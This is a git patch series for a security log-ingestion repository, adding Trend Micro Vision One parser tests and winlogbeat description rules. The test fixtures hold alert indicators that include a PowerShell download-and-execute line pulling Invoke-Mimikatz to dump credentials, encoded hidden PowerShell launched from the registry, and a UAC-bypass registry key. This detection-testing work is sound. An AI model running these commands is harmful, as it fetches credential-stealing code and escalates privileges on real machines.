\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json new file mode 100644 index 000000000..093876a30 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "email": "support@pctutordetroit.com" + } + } +} \ No newline at end of file From f316fac6627ec461e64f6d3fa367286cf088a1ad Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:52:34 +0200 Subject: [PATCH 056/150] Add smart descriptions --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 6 ++++++ Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 ++ Trend Micro/trend-micro-vision-one/tests/test_process.json | 1 + Trend Micro/trend-micro-vision-one/tests/test_registry.json | 1 + 4 files changed, 10 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index e69de29bb..7a3ee9d51 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -0,0 +1,6 @@ +[ + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 38a31dd29..be400399d 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -20,6 +20,8 @@ stages: observer.vendor: "TrendMicro" observer.product: "Vision One" + event.reason: "{{parsed_event.message.model}}" + - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 5eca6b2ea..d6ef4acd1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Credential Dumping via Mimikatz", "type": [ "info" ] diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 093876a30..f9873edf1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", "type": [ "info" ] From 4b2aab06f6f6c739acc1bc9f1557ccc496ed6edc Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:54:57 +0200 Subject: [PATCH 057/150] Add automation UUIDs --- Trend Micro/trend-micro-vision-one/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index c0121a28d..8363b7b96 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -1,4 +1,6 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 name: Trend Micro Vision One slug: trend-micro-vision-one From fbbe4c415d5ff8c2fd61103b32f54b68711e66a7 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 09:44:23 +0100 Subject: [PATCH 058/150] small fixes on conditions --- .../winlogbeat/_meta/smart-descriptions.json | 108 +++++++++++++++++- 1 file changed, 105 insertions(+), 3 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b720b4ffb..d3979925e 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -205,6 +205,35 @@ } ] }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", "relationships": [ @@ -222,6 +251,15 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, @@ -726,7 +764,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -802,7 +840,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -853,7 +891,7 @@ "field": "source.ip" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -1068,6 +1106,58 @@ } ] }, + { + "value": 